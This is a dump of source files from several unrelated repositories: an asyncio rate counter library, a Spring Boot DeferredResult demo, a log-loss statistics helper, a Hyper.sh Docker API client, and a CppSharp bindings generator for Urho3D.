        MoveEfficiency moveEfficiency = new MoveEfficiency(emptyTilesCount, score, move);
        rollback();
        return moveEfficiency;
    }
}
| 3a2d8e065b8f645dbb2e822422f27f3c34a91d34 | [
"Java"
] | 1 | Java | justignatoff/2048 | 79e744f4dbbc98bdfc14e0995d4d9098deab78e8 | 129fdd533d66a2d465771daad5eee5a264069bc6 |
refs/heads/master | <repo_name>arck1/aio-counter<file_sep>/README.md
Async counter with decrement after timeout (ttl)
> Python 3.7+
Install
-------
pip install git+https://github.com/arck1/aio-counter
Examples
-------
```
counter = AioCounter(max_count=10, start_count=0, ttl=1, loop=loop)
# increment the counter by 1, waiting until there is capacity
await counter.inc(value=1)

# increment the counter by 1, raising an exception if it is full
counter.inc_nowait(value=1)

# decrement the counter by 1, raising an exception if it is empty
counter.dec_nowait(value=1)

# decrement the counter by 1, waiting until it is non-zero
await counter.dec(value=1)

# increment by 2; the value is decremented back after 2 seconds; waits if full
await counter.inc(value=2, ttl=2)

# increment by 2 with a 2-second ttl, raising an exception if it would overflow
counter.inc_nowait(value=2, ttl=2)
```<file_sep>/tests/tests.py
import unittest
from asyncio import sleep
from async_unittest import TestCase
from aio_counter import AioCounter
from aio_counter.exceptions import AioCounterException
class TestAioCounter(TestCase):
    """Async tests for AioCounter using the shared loop from async_unittest."""

    # Timing constants (seconds) used to schedule delayed callbacks.
    TIK = float(0.3)
    TAK = float(0.6)
    TTL = int(1)

    @classmethod
    def setUpClass(cls) -> None:
        # One shared counter for the whole class; TestCase provides cls.loop.
        super().setUpClass()
        cls.counter = AioCounter(loop=cls.loop)

    @classmethod
    def tearDownClass(cls) -> None:
        super().tearDownClass()
        cls.counter.close()

    def setUp(self) -> None:
        # Reset the shared counter to a pristine state before every test.
        self.counter._count = 0
        self.counter._incs.clear()
        self.counter._decs.clear()
        # close all handlers
        self.counter.close()
        self.counter._handlers.clear()

    def tearDown(self) -> None:
        self.counter.close()

    async def test_dec(self):
        """dec() on an empty counter must block until an increment arrives."""
        assert self.counter.empty()
        self.counter._loop.call_later(self.TIK, self.counter.inc_nowait)
        assert self.counter.count == 0
        # wait until delayed inc_nowait increment counter
        count = await self.counter.dec()
        assert count == 0

    async def test_inc(self):
        """inc() on a full counter must block until a decrement frees a slot."""
        assert self.counter.empty()
        # fill counter
        self.counter._count = self.counter.max_count
        assert self.counter.count == self.counter.max_count
        self.counter._loop.call_later(self.TIK, self.counter.dec_nowait)
        assert self.counter.count == self.counter.max_count
        # wait until delayed dec_nowait decrement counter
        count = await self.counter.inc()
        assert count == self.counter.max_count

    def test_dec_nowait(self):
        """dec_nowait() raises on an empty counter and decrements otherwise."""
        assert self.counter.empty()
        try:
            self.counter.dec_nowait()
        except AioCounterException as e:
            assert e
        else:
            assert False
        count = self.counter.inc_nowait()
        assert count == 1
        assert self.counter.count == 1
        count = self.counter.dec_nowait()
        assert count == 0
        assert self.counter.count == 0

    def test_inc_nowait(self):
        """inc_nowait() increments until full, then raises."""
        assert self.counter.empty()
        count = self.counter.inc_nowait()
        assert count == 1
        assert self.counter.count == 1
        # fill counter
        self.counter._count = self.counter.max_count
        try:
            self.counter.inc_nowait()
        except AioCounterException as e:
            assert e
        else:
            assert False

    async def test_ttl_inc(self):
        """An increment with a ttl is automatically undone after ttl seconds."""
        assert self.counter.empty()
        # inc with ttl = TTL
        await self.counter.inc(self.TTL)
        assert self.counter.count == 1
        # sleep and inc() should run in one loop
        await sleep(self.TTL, loop=self.loop)
        # check if count was dec
        assert self.counter.count == 0

    async def test_bulk_inc(self):
        """
        inc() with value > 1 should success only if counter changed to <value > 1> in one moment
        :return:
        """
        assert self.counter.empty()
        # fill counter
        self.counter._count = self.counter.max_count - 1
        assert self.counter.count == self.counter.max_count - 1
        def delayed_check(counter):
            # Still waiting: the bulk inc must not have happened partially.
            assert counter.count == counter.max_count - 1
        self.counter._loop.call_later(self.TIK, delayed_check, self.counter)
        self.counter._loop.call_later(self.TTL, self.counter.dec_nowait)
        assert self.counter.count == self.counter.max_count - 1
        await self.counter.inc(value=2)
        assert self.counter.count == self.counter.max_count

    async def test_bulk_dec(self):
        """
        dec() with value > 1 should success only if counter changed to <value > 1> in one moment
        :return:
        """
        assert self.counter.empty()
        await self.counter.inc()
        assert self.counter.count == 1
        def delayed_check(counter):
            # Still waiting: the bulk dec must not have happened partially.
            assert counter.count == 1
        self.counter._loop.call_later(self.TIK, delayed_check, self.counter)
        self.counter._loop.call_later(self.TTL, self.counter.inc_nowait)
        assert self.counter.count == 1
        await self.counter.dec(value=2)
        assert self.counter.empty()

    async def test_ttl_after_dec(self):
        """A manual dec before the ttl fires must not make the count negative."""
        assert self.counter.empty()
        await self.counter.inc(self.TTL)
        assert self.counter.count == 1
        count = self.counter.dec_nowait()
        assert count == 0
        assert self.counter.count == 0
        await sleep(self.TTL, loop=self.loop)
if __name__ == '__main__':
unittest.main()
<file_sep>/examples/example.py
import asyncio
import time
from aio_counter import AioCounter
async def with_ttl(loop):
    """Demo: a ttl-counter paces 100 increments via its automatic decrements."""
    ttl_counter = AioCounter(max_count=10, start_count=2, ttl=1, loop=loop)
    print(ttl_counter.count)
    print(time.monotonic())
    for _step in range(100):
        await ttl_counter.inc(value=1)
    print(time.monotonic())
async def without_ttl(loop):
    """Demo: the basic inc/dec API of a counter without automatic decrements."""
    plain_counter = AioCounter(max_count=10, start_count=2, ttl=None, loop=loop)
    # increment, waiting for capacity
    await plain_counter.inc(value=1)
    # increment, raising if the counter is full
    plain_counter.inc_nowait(value=1)
    # decrement, raising if the counter is empty
    plain_counter.dec_nowait(value=1)
    # decrement, waiting until the counter is non-zero
    await plain_counter.dec(value=1)
async def main(loop):
    # Run both demos sequentially on the same loop.
    await with_ttl(loop)
    await without_ttl(loop)
if __name__ == '__main__':
    loop = asyncio.get_event_loop()
    loop.run_until_complete(main(loop))
<file_sep>/setup.py
import setuptools
from setuptools import setup, find_packages
# Read the long description shown on PyPI from the README.
with open('README.md', encoding='utf-8') as f:
    long_description = f.read()
version = '0.1'
setup(
    name='aio-counter',
    version=version,
    author='arck1',
    author_email='<EMAIL>',
    description="Async counter with decrement after timeout (ttl)",
    long_description=long_description,
    long_description_content_type='text/markdown',
    url='https://github.com/arck1/aio-counter',
    # Release archives are tagged v{version} on GitHub.
    download_url='https://github.com/arck1/aio-counter/archive/v{}.zip'.format(
        version
    ),
    license='MIT',
    classifiers=[
        'License :: OSI Approved :: MIT License',
        'Intended Audience :: Developers',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3.7',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'Programming Language :: Python :: Implementation :: CPython',
    ],
    zip_safe=False,
    python_requires='>=3.7',
    packages=find_packages(exclude=["examples", "tests"]),
    keywords='aio asyncio counter inc dec increment decrement ttl'
)
<file_sep>/aio_counter/__init__.py
from .counter import AioCounter
name = "aio-counter"
author = "arck1"<file_sep>/aio_counter/exceptions.py
class AioCounterException(Exception):
    """Raised by AioCounter when a non-waiting inc/dec cannot be satisfied."""
    pass
<file_sep>/aio_counter/counter.py
import asyncio
import collections
import uuid
from typing import Optional, Union
from .exceptions import AioCounterException
class AioCounter:
_MAX_COUNT = 100
_TTL = 5
def __init__(self, max_count: Optional[int] = None, start_count: int = 0, ttl: Optional[int] = _TTL,
loop=None):
"""
Control request rate per period
:param max_count:
:param start_count:
:param ttl:
:param loop:
"""
if max_count is None:
max_count = self._MAX_COUNT
if max_count is None or max_count <= 0:
raise ValueError(f"max_count: int should be positive integer value, not {str(max_count)}")
if loop is None:
loop = asyncio.get_event_loop()
self._loop = loop
self._count = start_count
self._max_count = max_count or AioCounter._MAX_COUNT
self._ttl = ttl or AioCounter._TTL
# Futures.
self._incs = collections.deque()
# Futures.
self._decs = collections.deque()
self._handlers = {}
@property
def count(self) -> int:
"""
Return AioCounter current value
:return:
"""
return self._count
@property
def max_count(self) -> int:
"""
Return AioCounter max_count value
:return:
"""
return self._max_count
def _wakeup_next(self, waiters: collections.deque):
"""
Wake up the next waiter (if any) that isn't cancelled.
:param waiters:
:return:
"""
while waiters:
waiter = waiters.popleft()
if not waiter.done():
waiter.set_result(None)
break
def normalize(self):
"""
If counter not initialize or broken
:return:
"""
if self._count is None:
self._count = 0
"""
Check if self._count between 0 and self._max_count
"""
self._count = max(
min(self._count, self._max_count),
0
)
def empty(self) -> bool:
self.normalize()
return self.count <= 0
def full(self) -> bool:
self.normalize()
return self.count >= self._max_count
def can_dec(self, value: int = 1) -> bool:
return self.count >= max(0, value)
def can_inc(self, value: int = 1) -> bool:
return self.count + max(0, value) <= self._max_count
def get_key(self) -> str:
"""
Return key for callback
:return:
"""
return uuid.uuid4().hex
def cancel(self):
"""
Graceful shutdown and close handlers
:return:
"""
for key, handler in self._handlers.items():
try:
handler.cancel()
except:
pass
def close(self):
self.cancel()
def inc_nowait(self, ttl: Optional[int] = None, value: int = 1) -> int:
"""
Direct synchronous increment counter
:param ttl: Optional[int] - time to live in seconds, if None ttl = INF
:param value: int
:return:
"""
if self.full():
raise AioCounterException("Counter is full")
if value is None:
value = 1
if self._count + value > self._max_count:
raise AioCounterException(f"New counter value = {self._count + value} "
f"greater than max_count = {self._max_count}")
self._count += value
self._wakeup_next(self._decs)
ttl = ttl or self._ttl
if ttl is not None and ttl > 0:
key = self.get_key()
self._handlers[key] = self._loop.call_later(ttl, self.__dec_callback, key, value)
return self.count
def dec_nowait(self, value: int = 1) -> int:
"""
Direct synchronous decrement counter
:param value:
:return:
:raise AioCounterException if can't dec counter
"""
if self.empty():
raise AioCounterException("Counter is empty")
if value is None:
value = 1
if self._count - value < 0:
raise AioCounterException(f"New counter value = {self._count + value} "
f"less than Zero)")
self._count -= value
self._wakeup_next(self._incs)
return self.count
def __dec_callback(self, key, value: int = 1) -> int:
"""
Callback wrapper for dec counter after ttl
:param key:
:param value:
:return:
"""
try:
self.dec_nowait(value=value)
except:
pass
else:
handler = self._handlers.pop(key, None)
if handler is not None:
handler.cancel()
return 1
return 0
async def inc(self, ttl: Optional[int] = None, value: int = 1) -> int:
    """
    Asynchronously increment the counter.

    If the counter is full(), wait until enough slots are freed, then
    delegate to inc_nowait(). The waiter bookkeeping below mirrors the
    waiter pattern used by asyncio.Queue.

    :param ttl: seconds until the increment is automatically undone
        (see inc_nowait)
    :param value: amount to add
    :return: the new counter value
    """
    while not self.can_inc(value=value):
        incer = self._loop.create_future()
        self._incs.append(incer)
        try:
            await incer
        # Bare except is the asyncio.Queue cleanup pattern: CancelledError
        # (a BaseException on modern Python) must also run this branch.
        except:
            incer.cancel()  # Just in case incer is not done yet.
            try:
                # Clean self._incs from canceled incer.
                self._incs.remove(incer)
            except ValueError:
                # The incer could have already been removed from
                # self._incs by the wakeup path.
                pass
            if not self.full() and not incer.cancelled():
                # We were woken up by dec_nowait(), but can't take
                # the slot.  Wake up the next waiter in line.
                self._wakeup_next(self._incs)
            raise
    return self.inc_nowait(ttl=ttl, value=value)
async def dec(self, value: int = 1) -> int:
    """
    Asynchronously decrement the counter.

    If the counter is empty(), wait until increments provide enough
    units, then delegate to dec_nowait(). The waiter bookkeeping below
    mirrors the waiter pattern used by asyncio.Queue.

    :param value: amount to subtract
    :return: the new counter value
    """
    while not self.can_dec(value=value):
        decer = self._loop.create_future()
        self._decs.append(decer)
        try:
            await decer
        # Bare except is the asyncio.Queue cleanup pattern: CancelledError
        # (a BaseException on modern Python) must also run this branch.
        except:
            decer.cancel()  # Just in case decer is not done yet.
            try:
                # Clean self._decs from canceled decer.
                self._decs.remove(decer)
            except ValueError:
                # The decer could have already been removed from
                # self._decs by the wakeup path.
                pass
            if not self.empty() and not decer.cancelled():
                # We were woken up by inc_nowait(), but can't take
                # the units.  Wake up the next waiter in line.
                self._wakeup_next(self._decs)
            raise
    return self.dec_nowait(value=value)
async def __aenter__(self):
    """Enter the async context manager, yielding the counter itself."""
    return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
    """Leave the async context manager, cancelling all pending TTL handlers.

    Returns None, so any in-flight exception propagates to the caller.
    """
    self.cancel()
| 0cca0221762eac04f497513f374a0224c41e713d | [
"Markdown",
"Python"
] | 7 | Markdown | arck1/aio-counter | ffff58bf14ca2f155be5a54c9385481fce5ee58c | 3dc6ebeb27120b0fc7437098450aa88411a4bead |
refs/heads/master | <file_sep>package com.fwtai.controller;
import com.fwtai.config.ResultResponse;
import com.fwtai.service.DeferredResultService;
import org.springframework.http.HttpStatus;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.context.request.async.DeferredResult;
import javax.annotation.Resource;
/**
* @作者 田应平
* @版本 v1.0
* @创建时间 2020-04-25 10:39
* @QQ号码 444141300
* @Email <EMAIL>
* @官网 http://www.fwtai.com
*/
@RestController
@RequestMapping("deferred")
public class DeferredResultController{

    @Resource
    private DeferredResultService deferredResultService;

    /**
     * Fixed request id used to keep the demo simple.
     * Concurrent requests sharing this one id will interfere with each
     * other, so this is only suitable for manual testing.
     */
    private final String requestId = "haha";

    // http://127.0.0.1:8030/deferred/get?timeout=8000
    @GetMapping(value = "/get")
    public DeferredResult<ResultResponse> get(@RequestParam(value = "timeout", required = false, defaultValue = "10000") Long timeout) {
        // The servlet thread is released immediately; the response is sent
        // once the DeferredResult is completed elsewhere (or it times out).
        final DeferredResult<ResultResponse> pending = new DeferredResult<>(timeout);
        deferredResultService.process(requestId, pending);
        return pending;
    }

    /** // http://127.0.0.1:8030/deferred/result?desired=失败
     * Completes the pending DeferredResult, simulating the asynchronous
     * producer side of the exchange.
     * @param desired outcome to simulate
     * @return a plain acknowledgement string
     */
    @GetMapping(value = "/result")
    public String settingResult(@RequestParam(value = "desired", required = false, defaultValue = "成功") String desired) {
        final ResultResponse outcome = new ResultResponse();
        if (ResultResponse.Msg.SUCCESS.getDesc().equals(desired)) {
            outcome.setCode(HttpStatus.OK.value());
            outcome.setMsg(desired);
        } else {
            outcome.setCode(HttpStatus.INTERNAL_SERVER_ERROR.value());
            outcome.setMsg(ResultResponse.Msg.FAILED.getDesc());
        }
        deferredResultService.settingResult(requestId, outcome);
        return "Done";
    }
}<file_sep>package com.fwtai.controller;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.CorsRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;
/**
* WebMvc配置器|Bean配置
* @作者 田应平
* @版本 v1.0
* @创建时间 2020-02-23 17:47
* @QQ号码 444141300
* @Email <EMAIL>
* @官网 <url>http://www.yinlz.com</url>
*/
@Configuration
public class WebConfig implements WebMvcConfigurer{
    // Cross-origin (CORS) rules applied to every endpoint.
    // NOTE(review): allowedOrigins("*") combined with allowCredentials(true)
    // is rejected at startup by Spring Framework 5.3+ (use
    // allowedOriginPatterns there) — confirm the Spring version before
    // upgrading this project.
    @Override
    public void addCorsMappings(final CorsRegistry registry) {
        registry.addMapping("/**")
        .allowedOrigins("*")
        .allowCredentials(true)
        .allowedMethods("*")
        .allowedHeaders("*")
        .maxAge(3600L);
    }
}<file_sep>package com.fwtai.controller;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import javax.annotation.Resource;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
/**
* api接口
* @作者 田应平
* @版本 v1.0
* @创建时间 2020-04-21 9:21
* @QQ号码 444141300
* @Email <EMAIL>
* @官网 http://www.fwtai.com
*/
@RestController
@RequestMapping("api")
public class ApiController{
@Resource
private HttpServletRequest request;
// http://127.0.0.1:8030/api/login
@GetMapping("login")
public void login(final HttpServletResponse response){
final JSONObject json = new JSONObject();
final String password = request.getParameter("password");
json.put("age","18");
json.put("name","甜果果");
json.put("password",<PASSWORD>);
json.put("code",200);
json.put("msg","操作成功");
json.put("data","表格数据");
responseJson(json.toJSONString(),response);
}
public void responseJson(final String json,final HttpServletResponse response){
response.setContentType("text/html;charset=utf-8");
response.setHeader("Cache-Control","no-cache");
PrintWriter writer = null;
try {
writer = response.getWriter();
writer.write(String.valueOf(JSON.parse(json)));
writer.flush();
}catch (IOException e){
e.printStackTrace();
}finally{
if(writer != null){
writer.close();
writer = null;
}
}
}
} | 6ace1670284f49bea8ba9f9c194f3493dd1d399c | [
"Java"
] | 3 | Java | gzstyp/origin | c807a8f50a7357d090330d2277a207a993c02b5e | 67f0a5aa922449b37030fa13f6fcbcd58078c4c8 |
refs/heads/master | <file_sep>from scipy import stats
from math import log
def dist_log_loss(y_true, y_pred, labels=None):
    """Descriptive log loss (aka logistic loss or cross-entropy loss).

    For a single sample with true label yt and estimated probability yp
    assigned to yt, the per-sample loss is -log(yp).  Unlike sklearn's
    ``log_loss`` (which reports only the mean) this returns summary
    statistics of the whole per-sample loss distribution.

    Parameters
    ----------
    y_true : array-like
        Ground truth (correct) labels for n_samples samples.
    y_pred : array-like of float, shape = (n_samples, n_classes)
        Predicted probabilities; column order must follow ``labels`` when
        given, otherwise the sorted unique values of ``y_true``.
    labels : array-like, optional (default=None)
        If not provided, labels will be inferred from y_true.

    Returns
    -------
    dict
        Keys 'mean', 'variance', 'skewness' and 'kurtosis' of the
        per-sample losses.

    Raises
    ------
    ValueError
        If a true label is assigned probability 0 (log(0) is undefined).
    """
    # Fixed label order -> probability-column index.  (The mutable default
    # ``labels=[]`` was replaced by None; an empty sequence still means
    # "infer from y_true", matching the docstring.)
    if labels is not None and len(labels) > 0:
        order = list(labels)
    else:
        order = sorted(set(y_true))
    # Precompute O(1) lookups; keep the FIRST occurrence of a duplicate
    # label to match list.index semantics.
    index = {}
    for i, label in enumerate(order):
        index.setdefault(label, i)
    losses = [-log(prob[index[tr]]) for tr, prob in zip(y_true, y_pred)]
    d = stats.describe(losses)
    return {'mean': d.mean, 'variance': d.variance,
            'skewness': d.skewness, 'kurtosis': d.kurtosis}
<file_sep>"""Six different set of predictions with corresponding dist log losses"""
from function import dist_log_loss

# Ground-truth labels shared by every experiment below.
_TRUTH = ['q', 'w', 'q', 'w', 'w', 'q', 'q', 'q', 'w', 'q']


def _preds(*head):
    """Ten prediction pairs: ``head`` overrides the front, rest stay [.5, .5]."""
    return list(head) + [[.5, .5]] * (10 - len(head))


# Six prediction sets of gradually increasing confidence.
lg5 = dist_log_loss(_TRUTH, _preds())
lg7 = dist_log_loss(_TRUTH, _preds([.7, .3]))
lg9 = dist_log_loss(_TRUTH, _preds([.9, .1]))
lg92 = dist_log_loss(_TRUTH, _preds([.9, .1], [.9, .1]))
lg97 = dist_log_loss(_TRUTH, _preds([.9, .1], [.9, .1], [.7, .3]))
lg979 = dist_log_loss(_TRUTH, _preds([.9, .1], [.9, .1], [.7, .3], [.1, .9]))
ls = {'5_5': lg5, '7g': lg7, '9g': lg9, '9g9b': lg92, '9g9b7g': lg97, '9g9b7g9g': lg979}
print('\n\n')
for k in ls.keys():
    print(k, '\t\t', ls[k])
# The result:
# 5_5 {'mean': 0.6931471805599453, 'variance': 0.0, 'skewness': 0.0, 'kurtosis': -3.0}
# 7g {'mean': 0.659499956897824, 'variance': 0.011321356601688145, 'skewness': -2.6666666666666674, 'kurtosis': 5.111111111111114}
# 9g {'mean': 0.6343685140697334, 'variance': 0.03454931634367559, 'skewness': -2.6666666666666674, 'kurtosis': 5.111111111111114}
# 9g9b {'mean': 0.7953123053131435, 'variance': 0.3146007144731806, 'skewness': 2.049197215806169, 'kurtosis': 3.721929588389468}
# 9g9b7g {'mean': 0.7616650816510221, 'variance': 0.33356112174828945, 'skewness': 2.010784111427777, 'kurtosis': 3.4917114339583613}
# 9g9b7g9g {'mean': 0.7028864151608103, 'variance': 0.37706019555161346, 'skewness': 1.833955183433394, 'kurtosis': 2.920378861340641}
# the first and the last prediction have the same mean ( same log loss) but different variance and skewness
<file_sep># dist_log_loss
A function for a descriptive log loss; not just the mean!
The log-loss function in scikit-learn returns only the mean of the per-sample losses, which is not very informative.
The `dist_log_loss` function implemented here returns additional statistics: mean, variance, skewness, and kurtosis.
| c9f76f3971232b8122fdb1e1bc2e4ccf59b956ed | [
"Markdown",
"Python"
] | 3 | Python | dzahedia/dist_log_loss | 39c87cbcf82ce7588f5faeba769cb4fbb7d4f2bc | 2328fb4a6d722c625fcc24a0760ab55a31a2ad7f |
refs/heads/master | <file_sep>flake8
yapf
nose
mock
<file_sep>docker>=2.0.0,<4.*
six>=1.10.0<file_sep>import os
import unittest
import hyper_sh
SKIP_MESSAGE = 'Hyper integration tests are for local testing only.'
@unittest.skipIf(os.environ.get('TRAVIS') == 'true', SKIP_MESSAGE)
def test_list_images():
client = hyper_sh.from_env()
images = client.images.list()
assert len(images) != 0
@unittest.skipIf(os.environ.get('TRAVIS') == 'true', SKIP_MESSAGE)
def test_create_container():
client = hyper_sh.from_env()
container = client.containers.create('busybox')
container.remove(force=True)
<file_sep>Python client for Hyper.sh
==========================
.. image:: https://api.travis-ci.org/tardyp/hyper_sh.svg?branch=master
:alt: Build Status
A wrapper around docker-py_ to support Hyper's authentication system.
Hyper uses Amazon's
`Signature Version 4 <https://docs.aws.amazon.com/general/latest/gr/signature-version-4.html>`_
(dubbed AWS4) to authenticate against it's service. This library replaces's docker-py's auth
module with a patched version of requests-aws4auth_ AWS4.
Installation
============
::
pip install hyper_sh
Usage
=====
As hyper_sh is a wrapper around docker-py, the API is the same.
See the `docker-py documentaiton <https://docker-py.readthedocs.io>`_.
The default usage, via the hyper_sh.from_env helper function, will
automatically discover your Hyper configuration from environment
variables and the default config file location:
.. code-block:: python
import docker
client = docker.from_env()
print(client.images.list())
One area the Hyper client differs from the Docker client is in the loading
of config. The initializers of hyper_sh.Client and hyper_sh.APIClient
require a positional argument for the config.
This can be either the location of a Hyper config file:
.. code-block:: python
from hyper_sh import Client
client = Client('path/to/config.json')
print(client.images.list())
or a valid Hyper config object:
.. code-block:: python
from hyper_sh import Client
client = Client({'clouds': {
os.environ['HYPER_ENDPOINT']: {
'accesskey': os.environ['HYPER_ACCESSKEY'],
'secretkey': os.environ['HYPER_SECRETKEY']
}
}})
print(client.images.list())
API support
===========
Hyper doesn't support the full Docker API so some features of docker-py will not work. See the
`Hyper_ API documentaiton <https://docs.hyper.sh/Reference/API/2016-04-04%20[Ver.%201.23]/>`_
for details of their Docker API support (features not supported will be marked as IGNORED).
Conversely, Hyper has features that do not exist in the Docker API, and these are not currently
supported by hyper_sh.
.. _docker-py: https://github.com/docker/docker-py
.. _requests-aws4auth: https://github.com/sam-washington/requests-aws4auth<file_sep>import json
import logging
import os
try:
from urllib.parse import urlparse
except ImportError:
# Python < 3.0 compat
from urlparse import urlparse
from docker import APIClient as DockerAPIClient
from docker import DockerClient, auth as docker_auth
from .requests_aws4auth import AWS4Auth
log = logging.getLogger(__name__)
# The docker library performs config file validation before we can get
# to it, so we need to override the config filename. The hyper config
# is still a valid Docker config file, it just has an additional key.
docker_auth.DOCKER_CONFIG_FILENAME = os.path.join('.hyper', 'config.json')
class APIClient(DockerAPIClient):
# This is the Docker API version that Hyper currently
# supports. The docker library uses a higher API version
# by default so we need to set this explicity.
API_VERSION = '1.23'
DEFAULT_REGION = 'us-west-1'
def __init__(self, config, **kwargs):
self.config = config
clouds = config.get('clouds')
if not isinstance(clouds, dict):
log.debug('Invalid config')
raise RuntimeError('Invalid config')
cloud_list = list(clouds.items())
if len(cloud_list) != 1:
log.debug('Invalid config')
raise RuntimeError('Only one cloud is support in the config.')
url, self.creds = cloud_list[0]
url = urlparse(url)
# The default endpoint URL can contain a wildcard for the region
# subdomain so we need to make sure we replace that with a valid
# region when building the base_url.
base_url = 'https://{}'.format(url.netloc.replace('*', self.creds['region']))
super(APIClient, self).__init__(
base_url, version=APIClient.API_VERSION, tls=True, **kwargs)
self.auth = AWS4Auth(self.creds['accesskey'], self.creds['secretkey'],
self.creds['region'], 'hyper')
class Client(DockerClient):
DEFAULT_CONFIG_FILE = '~/.hyper/config.json'
@staticmethod
def config_object(endpoint, accesskey, secretkey, region):
return {
'clouds': {
endpoint: {
'accesskey': accesskey,
'secretkey': secretkey,
'region': region
}
}
}
@classmethod
def from_env(cls):
log.debug('Looking for auth config')
keys = ['HYPER_ENDPOINT', 'HYPER_ACCESSKEY', 'HYPER_SECRETKEY', 'HYPER_REGION']
endpoint, accesskey, secretkey, region = [os.environ.get(k) for k in keys]
# The common standard is for environment variables to be
# uppercase, but for backwards compatibility we need to
# check for lowercase variables as well.
if not (endpoint and accesskey and secretkey):
endpoint, accesskey, secretkey, region = [
os.environ.get(k.lower()) for k in keys
]
region = region if region else APIClient.DEFAULT_REGION
if endpoint and accesskey and secretkey:
config = cls.config_object(endpoint, accesskey, secretkey, region)
print('Found config in memory')
return cls(config=config)
log.debug('No auth config in memory - loading from filesystem')
# Config not found in environment variables.
default_config_file = os.path.expanduser(cls.DEFAULT_CONFIG_FILE)
if os.path.isfile(default_config_file):
# We don't read the file here as we allow the user to
# pass the location to a config file, or a config object
# during initialisation.
config = json.load(open(default_config_file))
print('Found config in default file.')
return cls(config=config)
if not (endpoint and accesskey and secretkey):
log.debug('No auth config found')
raise RuntimeError('Unable to guess config from default file or environment.')
def __init__(self, config, **kwargs):
# config = kwargs.get('config')
if isinstance(config, str):
# Assume config is a file path.
config = json.load(open(os.path.expanduser(config)))
if not isinstance(config, dict):
raise TypeError('Invalid config object')
self.api = APIClient(config, **kwargs)
from_env = Client.from_env
<file_sep># flake8: noqa
from .client import Client, APIClient, from_env
__title__ = 'hyper_sh'
<file_sep>import json
import os
from unittest import TestCase
try:
from unittest.mock import patch
except ImportError:
# Python < 3.3 compat
from mock import patch
from hyper_sh import Client, APIClient, from_env
config_path = os.path.join(os.path.dirname(__file__), 'hyper_config.json')
class TestConfig(TestCase):
@patch.object(os, 'environ', {})
@patch.object(Client, 'DEFAULT_CONFIG_FILE', 'no_file.json')
def test_invalid_path(self):
# Test no default file and no env vars.
with self.assertRaises(TypeError):
Client()
# Test file can't be found.
with self.assertRaises(IOError):
Client('no_file.json')
# Test invalid config.
with self.assertRaises(RuntimeError):
Client({})
# Test invalid clouds.
with self.assertRaises(RuntimeError):
Client({'clouds': {'a': {}, 'b': {}}})
def test_valid_config(self):
# Test with valid env vars.
with patch.object(
os, 'environ', {
'HYPER_ENDPOINT': 'tcp://us-west-1.hyper.sh:443',
'HYPER_ACCESSKEY': 'abc123',
'HYPER_SECRETKEY': '321cba'
}):
assert (isinstance(from_env(), Client))
# Test with valid config file.
assert (Client(config_path))
# Test with valid config object.
config = json.load(open(config_path))
assert (Client(config))
def test_lowercase_envvars(self):
# Test with valid env vars.
with patch.object(
os, 'environ', {
'hyper_endpoint': 'tcp://us-west-1.hyper.sh:443',
'hyper_accesskey': 'abc123',
'hyper_secretkey': '321cba'
}):
assert (isinstance(from_env(), Client))
def test_valid_base_url(self):
config = json.load(open(config_path))
api_client = APIClient(config=config)
# Test base_url correct.
assert (api_client.base_url == 'https://us-west-1.hyper.sh:443')
# Test base_url includes correct region.
endpoint = list(config['clouds'].keys())[0]
region_config = {
'clouds': {
'tcp://eu-central-1.hyper.sh:443': config['clouds'][endpoint]
}
}
api_client = APIClient(config=region_config)
assert (api_client.base_url == 'https://eu-central-1.hyper.sh:443')
def test_auth_has_config(self):
config = json.load(open(config_path))
clouds = list(config['clouds'].items())
endpoint, creds = clouds[0]
auth = APIClient(config).auth
# Test that all config values are present and correct.
assert (auth.access_id == creds['accesskey'])
assert (auth.signing_key.secret_key == creds['secretkey'])
assert (auth.region == creds['region'])
| dd03dc54da73710a32ca3c0c04358c23e3b07b2c | [
"Python",
"Text",
"reStructuredText"
] | 7 | Text | aequitas/hyper_sh | 8a4c52ac88fdcc052f3c008377bdf77e70c30904 | e3da35abe467eb05396db245bf0964860aba848b |
refs/heads/master | <repo_name>tritao/Urho3D<file_sep>/Bindings/Makefile
#CPPSHARP_DIR = CppSharp
CPPSHARP_DIR = /Users/joao/Dev/CppSharp/build/gmake/lib/Debug_x32
CPPSHARP_REFS = -r:$(CPPSHARP_DIR)/CppSharp.dll \
-r:$(CPPSHARP_DIR)/CppSharp.AST.dll \
-r:$(CPPSHARP_DIR)/CppSharp.Parser.CSharp.dll \
-r:$(CPPSHARP_DIR)/CppSharp.Generator.dll
NEWTONSOFT_DIR = Newtonsoft.Json.6.0.8/lib/net45
DEPS_REFS =
SRC_ROOT = ../..
TARGET_NAME = UrhoBindingsGen
TARGET_EXE = $(TARGET_NAME).exe
.stamp-clone:
@if [ ! -d $(CPPSHARP_DIR) ]; then \
git clone <EMAIL>:tritao/CppSharpBinaries.git $(CPPSHARP_DIR); \
touch $@; \
fi
.stamp-deps:
#nuget install Newtonsoft.Json
touch $@;
$(TARGET_EXE): .stamp-clone .stamp-deps UrhoBindingsGen.cs
mcs UrhoBindingsGen.cs $(CPPSHARP_REFS) $(DEPS_REFS)
gen: $(TARGET_EXE)
MONO_PATH=$(CPPSHARP_DIR) mono $(TARGET_EXE)
gen-proj:
$(CPPSHARP_DIR)/premake5 vs2012
clean:
rm $(TARGET_EXE)
all: $(TARGET_EXE)<file_sep>/Bindings/UrhoBindingsGen.cs
using CppSharp;
using CppSharp.AST;
using CppSharp.Passes;
using System;
using System.IO;
using System.Linq;
namespace Mono
{
class UrhoBindingsGen : ILibrary
{
public void Setup(Driver driver)
{
var options = driver.Options;
options.LibraryName = "Urho";
options.OutputDir = "Urho";
options.Verbose = false;
options.SetupXcode();
options.addIncludeDirs(Path.GetFullPath("../Source/Urho3D"));
options.Headers.Add("Engine/Application.h");
}
